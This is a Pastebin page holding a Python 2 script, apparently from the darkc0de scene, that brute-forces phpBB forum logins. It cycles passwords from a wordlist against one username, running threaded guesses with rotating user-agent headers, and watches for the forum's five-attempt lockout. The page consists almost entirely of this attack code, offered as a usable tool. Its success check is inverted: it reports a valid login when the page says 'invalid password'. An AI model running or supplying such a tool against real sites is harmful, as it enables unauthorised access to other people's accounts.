TrojanSpot

PhpBB BruteForcer | www.pemula.info

Oct 28th, 2012
190
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.27 KB | None | 0 0
  1. #!usr/bin/python
  2. #phpBB Brute Forcer POC
  3. #POC because of the 5 login attempts for 30 min, proxies?
  4. #
  5. #To use this script you need ClientCookie and Client Form.
  6. #http://wwwsearch.sourceforge.net/ClientCookie/src/ClientCookie-1.0.3.tar.gz
  7. #http://wwwsearch.sourceforge.net/ClientForm/src/ClientForm-0.1.17.tar.gz
  8. #To install the package, run the following command:
  9. #python setup.py build
  10. #then (with appropriate permissions)
  11. #python setup.py install
  12. #http://www.darkc0de.com
  13. #d3hydr8[at]gmail[dot]com
  14.  
  15. import threading, time, random, sys, socket, httplib, re
  16. try:
  17.     sys.path.append('ClientCookie-1.0.3')
  18.     import ClientCookie
  19.     sys.path.append('ClientForm-0.1.17')
  20.     import ClientForm
  21. except(ImportError):
  22.     print "\nTo use this script you need ClientCookie and Client Form."
  23.     print "Read the top intro for instructions.\n"
  24.     sys.exit(1)
  25. from copy import copy
  26.  
  27. if len(sys.argv) !=4:
  28.     print "Usage: ./phpBBbrute.py <server> <user> <wordlist>"
  29.     sys.exit(1)
  30.  
  31. try:
  32.     words = open(sys.argv[3], "r").readlines()
  33. except(IOError):
  34.     print "Error: Check your wordlist path\n"
  35.     sys.exit(1)
  36.  
  37. print "\n\t   d3hydr8[at]gmail[dot]com phpBBBruteForcer v1.0"
  38. print "\t--------------------------------------------------\n"
  39. print "[+] Server:",sys.argv[1]
  40. print "[+] User:",sys.argv[2]
  41. print "[+] Words Loaded:",len(words),"\n"
  42.  
  43. headers = ["Mozilla/5.0 (compatible)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)", "Windows-RSS-Platform/1.0 (MSIE 7.0; Windows NT 5.1)", "Windows NT 6.0 (MSIE 7.0)", "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)", "Windows NT 4.0 (MSIE 5.0)"]
  44. wordlist = copy(words)
  45.  
  46. def reloader():
  47.     for word in wordlist:
  48.         words.append(word)
  49.  
  50. def getword():
  51.     lock = threading.Lock()
  52.     lock.acquire()
  53.     if len(words) != 0:
  54.         value = random.sample(words,  1)
  55.         words.remove(value[0])
  56.        
  57.     else:
  58.         print "Reloading Wordlist\n"
  59.         reloader()
  60.         value = random.sample(words,  1)
  61.        
  62.     lock.release()
  63.     return value[0]
  64.        
  65. class Worker(threading.Thread):
  66.    
  67.     def run(self):
  68.         global success
  69.         value = getword()
  70.         try:
  71.             print "-"*12
  72.             print "User:",sys.argv[2],"Password:",value
  73.             cookieJar = ClientCookie.CookieJar()
  74.             opener = ClientCookie.build_opener(ClientCookie.HTTPCookieProcessor(cookieJar))
  75.             opener.addheaders = [("User-agent", random.sample(headers,  1)[0])]
  76.             ClientCookie.install_opener(opener)
  77.             fp = ClientCookie.urlopen(sys.argv[1])
  78.             forms = ClientForm.ParseResponse(fp)
  79.             form = forms[0]
  80.             form["username"] = sys.argv[2]
  81.             form["password"] = value      
  82.             fp = ClientCookie.urlopen(form.click())
  83.             site = fp.readlines()
  84.             for line in site:
  85.                 if re.search("invalid password", line.lower()) != None:
  86.                     print "\tSuccessful Login:", value
  87.                     print line
  88.                     success =  value
  89.                     sys.exit(1)
  90.                 if re.search("The maximum number of 5 login attempts has been exceeded.",line):
  91.                     print "Attempts exceeded"
  92.             fp.close()
  93.         except(socket.gaierror), msg:
  94.             pass
  95.  
  96. for i in range(len(words)):
  97.     work = Worker()
  98.     work.start()
  99.     time.sleep(1)
  100. time.sleep(3)
  101. try:
  102.     if success:
  103.         print "\n\n[+] Successful Login:",sys.argv[1]
  104.         print "[+] User:",sys.argv[2]," Password:",success
  105. except(NameError):
  106.     print "\n[+] Couldn't find correct password"
  107.     pass
  108. print "\n[+] Done\n"
Add Comment
Please, Sign In to add comment